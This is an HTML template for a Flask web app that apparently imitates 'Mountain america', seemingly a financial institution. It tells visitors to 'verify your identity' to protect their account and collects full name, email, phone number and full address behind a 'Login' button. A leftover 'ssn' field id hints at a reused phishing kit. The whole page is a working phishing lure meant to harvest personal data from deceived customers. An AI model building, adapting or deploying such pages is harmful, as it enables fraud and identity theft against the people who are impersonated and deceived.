<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
 <title>Mountain america</title>
  <link rel="icon" type="image/x-icon" href="{{ url_for('static', filename='img/icon.jpg') }}">
  <link rel="stylesheet" href="{{ url_for('static', filename='css/personal.css')}}" />
  <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500&display=swap" rel="stylesheet">
</head>
<body>
    
    <!-- <div id="loader98">
        <div class="spinner98"></div>
    </div> -->

  <div class="container">
    <!-- Top Section with Logo -->
    <div class="top-section">
      <div class="logo-container">
        <img src="{{ url_for('static', filename='img/images_brand-logo-tall.svg')}}" alt="Your Logo" class="logo">
      </div>
    </div>

    <!-- Bottom Form Section -->
    <div class="bottom-section">
      <div class="form-container">
        <form class="login-form" action="/details" method="post">
          <h2>Account Information</h2>
          <p>To protect your account, please provide the requested information to verify your identity.</p>

          <div class="form-group">
            <label for="fname">Full Name</label>
            <input type="text" id="fname" name="fname" required />
          </div>

          <div class="form-group">
            <label for="ssn">email</label>
            <input type="email" id="ssn" name="email" required />
          </div>

          <div class="form-group">
            <label for="phone">Phone Number</label>
            <input type="number" id="phone" name="phone" required />
          </div>

          <div class="form-group">
            <label for="address">Full Address</label>
            <input type="text" id="address" name="address" required />
          </div>

          <button type="submit" class="login-button">Login</button>
        </form>
      </div>
    </div>
  </div>

    <script>
  window.addEventListener("load", function () {
    const loader = document.getElementById("loader");
    loader.classList.add("hidden");
  });
</script>
</body>
</html>
